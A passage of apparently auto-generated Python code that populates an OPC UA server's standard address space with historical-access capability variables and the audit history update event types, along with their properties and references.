ref.SourceNodeId = NumericNodeId(2334, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2334, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2334, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2335, 0)
node.BrowseName = QualifiedName('ReplaceDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2335, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2335, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2335, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2336, 0)
node.BrowseName = QualifiedName('UpdateDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2336, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2336, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2336, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2337, 0)
node.BrowseName = QualifiedName('DeleteRawCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteRawCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2337, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2337, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2337, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2338, 0)
node.BrowseName = QualifiedName('DeleteAtTimeCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteAtTimeCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2338, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2338, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2338, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11278, 0)
node.BrowseName = QualifiedName('InsertEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11278, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11278, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11278, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11279, 0)
node.BrowseName = QualifiedName('ReplaceEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11279, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11279, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11279, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11280, 0)
node.BrowseName = QualifiedName('UpdateEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11280, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11280, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11280, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11501, 0)
node.BrowseName = QualifiedName('DeleteEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11501, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11501, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11501, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11270, 0)
node.BrowseName = QualifiedName('InsertAnnotationCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertAnnotationCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11270, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11270, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11270, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11172, 0)
node.BrowseName = QualifiedName('AggregateFunctions', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(61, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateFunctions")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11172, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(61, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11172, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11172, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
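# AuditHistoryEventUpdateEventType (i=2999): abstract ObjectType under i=2104
# with UpdatedNode, PerformInsertReplace, Filter, NewValues and OldValues
# properties.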
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2999, 0)
node.BrowseName = QualifiedName('AuditHistoryEventUpdateEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(2104, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryEventUpdateEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3025, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3028, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3003, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3029, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3030, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(2999, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2104, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3025, 0)
node.BrowseName = QualifiedName('UpdatedNode', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdatedNode")
attrs.DataType = ua.NodeId(ua.ObjectIds.NodeId)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3025, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3025, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3025, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3028, 0)
node.BrowseName = QualifiedName('PerformInsertReplace', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PerformInsertReplace")
attrs.DataType = NumericNodeId(11293, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3028, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3028, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3028, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3003, 0)
node.BrowseName = QualifiedName('Filter', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Filter")
attrs.DataType = NumericNodeId(725, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3003, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3003, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3003, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3029, 0)
node.BrowseName = QualifiedName('NewValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("NewValues")
attrs.DataType = NumericNodeId(920, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3029, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3029, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3029, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3030, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2999, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(920, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3030, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3030, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3030, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2999, 0)
refs.append(ref)
server.add_references(refs)
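# AuditHistoryValueUpdateEventType (i=3006): abstract ObjectType under i=2104
# with UpdatedNode, PerformInsertReplace, NewValues and OldValues properties.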
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3006, 0)
node.BrowseName = QualifiedName('AuditHistoryValueUpdateEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(2104, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryValueUpdateEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3026, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3031, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3032, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3033, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3006, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2104, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3026, 0)
node.BrowseName = QualifiedName('UpdatedNode', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdatedNode")
attrs.DataType = ua.NodeId(ua.ObjectIds.NodeId)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3026, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3026, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3026, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3031, 0)
node.BrowseName = QualifiedName('PerformInsertReplace', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PerformInsertReplace")
attrs.DataType = NumericNodeId(11293, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3031, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3031, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3031, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3032, 0)
node.BrowseName = QualifiedName('NewValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("NewValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3032, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3032, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3032, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
